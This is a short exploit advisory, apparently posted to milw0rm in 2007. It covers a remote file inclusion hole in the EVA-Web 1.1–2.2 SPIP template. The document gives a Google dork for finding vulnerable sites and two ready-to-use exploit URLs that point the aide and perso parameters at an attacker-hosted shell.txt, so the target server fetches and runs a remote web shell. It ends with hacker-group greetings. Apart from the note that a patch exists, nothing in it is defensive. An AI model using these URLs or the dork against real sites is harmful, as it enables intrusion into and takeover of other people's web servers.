############################################################################################### # ___ ___ _ # / _ \ / _ \ | | # __ _| | | | | | |_ __ ___ _ __ ___| |_ # / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| # __/ | # |___/ ############################################################################################### #Program Title ################################################################################ #EVA-Web 1.1<=2.2 Remote File Inclusion # #Note ####################################################################################### #A patch was released some time ago..but there was never an exploit released.. # #Script Download ############################################################################## #http://spip-edu.edres74.net # #d0rk ###################################################################################### #"et utilise le squelette EVA-Web" -3.0 -2.3 # #Spl0it ######################################################################################### #www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt? #www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt? # #vuln discovered by ############################################################################### #MurderSkillz # #shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, #fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury, #, Bernard, and everyone else at g00ns.net ############################################################################################### # milw0rm.com [2007-06-26]